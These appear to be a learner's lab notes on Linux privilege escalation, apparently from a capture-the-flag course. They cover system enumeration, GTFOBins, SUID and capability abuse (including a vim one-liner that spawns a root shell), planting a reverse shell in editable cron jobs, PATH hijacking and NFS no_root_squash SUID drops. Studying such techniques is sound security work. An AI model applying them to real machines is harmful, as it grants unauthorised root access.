- By Sai Sathvik
- In order to understand what a particular Linux command does, use: https://www.explainshell.com/
- Important Resource: https://null-byte.wonderhowto.com/how-to/crack-shadow-hashes-after-getting-root-linux-system-0186386/
- Privilege escalation is the technique used to escalate our privileges from lower user to higher user(interms of privileges)
- Once we obtain the higher level privilege on the system then we can do a lot of things on that system
- Here we're going to see few commands which help us in enumerating target system
hostname- lists the name of the hostuname -a- prints kernel informationcat /proc/version- prints almost same infor of above command but more like gcc version....cat /etc/issue- exact version on the OSps- lists the processes that are runningps -A- all running processesps axjf- process treeps aux- displays processes with the users as well
env- shows all the environment variablesudo -l- lists the commands that any user run as root without passwordgroups- lists the groups that current user is inid- lists id of group,usercat /etc/passwd- displays all the usercat /etc/passwd | cut -d ":" -f 1- removes other stuff & only displays usersls /home- displays users
history- previously ran commands which might have some sensitive infoifconfig(or)ip a(or)ip route- network related information- netstat - network route
netstat -a- all listening and established connectionnetstat -at- tcp connectionsnetstat -au- udp connectionsnetstat -l- listening connectionsnetstat -s- network statisticsnetstat -tp- connections with service name and pid we can also add "l" for only listening portsnetstat -i- interface related informationnetstat -ano
- find command which helps us in finding lot of stuff,
- Syntax:
find <path> <options> <regex/name>find . -name flag1.txt: find the file named “flag1.txt” in the current directory find /home -name flag1.txt: find the file names “flag1.txt” in the /home directoryfind / -type d -name config: find the directory named config under “/”find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)find / -perm a=x: find executable filesfind /home -user frank: find all files for user “frank” under “/home”find / -mtime 10: find files that were modified in the last 10 daysfind / -atime 10: find files that were accessed in the last 10 dayfind / -cmin -60: find files changed within the last hour (60 minutes)find / -amin -60: find files accesses within the last hour (60 minutes)find / -size 50M: find files with a 50 MB sizefind / -writable -type d 2>/dev/null: Find world-writeable foldersfind / -perm -222 -type d 2>/dev/null: Find world-writeable foldersfind / -perm -o w -type d 2>/dev/null: Find world-writeable foldersfind / -perm -o x -type d 2>/dev/null: Find world-executable folders- We can also find programming languages and supported languages:
find / -name perl*,find / -name python*,find / -name gcc*...etc find / -perm -u=s -type f 2>/dev/null: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user. This is important!
- Syntax:
- We can even make use of "grep", "locate", "sort"...etc
- In real life we dont get much time to do enumeration so we can make use of some cool automated scripts like follows,
- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- LinEnum: https://github.com/rebootuser/LinEnum
- LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
- Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
- Linux Priv Checker: https://github.com/linted/linuxprivchecker
- After finding the version of Kernel simple google for that exploit or you can also use "Linux Exploit suggester"
- Once you find the exploit for the privesc, transfer the payload from your machine to target machine and execute and you're good to go.
- In an example I worked out with overlayfs exploit and got higher privileges
- This one of the first step to do, when you get access to the machine just simpley run "sudo -l", which lists all the files that we can run as root without any password
- Once you have any to run then navigate to https://gtfobins.github.io/ and search for is the one specified is a system program or else modify the file with "/bin/sh" and run that
- GTFO bins is going to be saviour!
- Its a kind of permission which gives specific permissions to run a file as root/owner
- This is really helpful to test.
find / -perm -u=s -type f 2>/dev/nullthis will list all the suid files- Then later search in GTFObins and look for the way to bypass
- Resource: https://null-byte.wonderhowto.com/how-to/crack-shadow-hashes-after-getting-root-linux-system-0186386/
- Capabilities are a bit similar to the SUID
- Capabilities provide a subset of root privileges to a process or a binary
- In order to look for them use
getcap -r / 2>/dev/null - Find the binary and check that on GTFOBins where there's a function for Capabilities and try out those any of them will work!
- In the example they provided a capability for
vimand I used./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'which is provided in the website itself and I got root! - Remember that this process is hit or trail, if it doesnt work move on!
- Crons jobs are used for scheduling! Here we can schedule any binary/process to run.
- Interesting part here is that by default they run with the owner privileges.
- But if we find any cron-job which we can edit then we can do a lot!
- Cron job config is stored as crontabs
- To view crontab,
cat /etc/crontab - Any one can view it!
- Now we'll can see some cron-jobs see whether you can edit or not, if you can then edit with some reverse shell and listen!
- PATH is an environment variable
- In order to run any binary we need to specify the full path also, but if the address of file is specified in PATH variable then we can simpley run the binary by mentioning its name, like how we run some command line tools like ls, cd,....etc
- In order to view the content in PATH variable we need to run
echo $PATHand the outpur will be something like thisusr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin - So whenever you use a tool without specifying path it searches in PATH and it runs!
- We can even add new path to PATH variable by
export PATH=<new-path>:$PATH - Also we need to find a writable paths so run
find / -writable 2>/dev/null - In the example I found a location where there's a script when I run its showing that "thm" not found, also it can be run as ROOT
- So I created a binary like
echo "/bin/bash" > thmand gave executable rights then later added the path where thm located to PATH variable and now when I ran the binary then I got root!
- In order to view the configuration of NFS run
cat /etc/exportsor also we can typeshowmount -e <target IP>on our machine to find the mountable shares. - In the output look for directories having
no_root_squash, this means that the particular share is writable, hence we can do something to acquires root! - Now after getting some directories where we can play around lets navigate to our attacker machine and create a sample directory anywhere like
/tmp...etc - Now we need to mount to the target machine by,
mount -o rw <targetIP>:<share-location> <directory path we created>, hererwmeans read, write privileges. - Now go to the folder we created and create a binary which gives us root on running.
- Then go back to the target machine and we can view the binary we created in the place we mounted, now run that and get root privileges!(do note that giving executable rights is not sufficient, we also need to give share rights by
chmod +s <binary>) - Then we're good to go!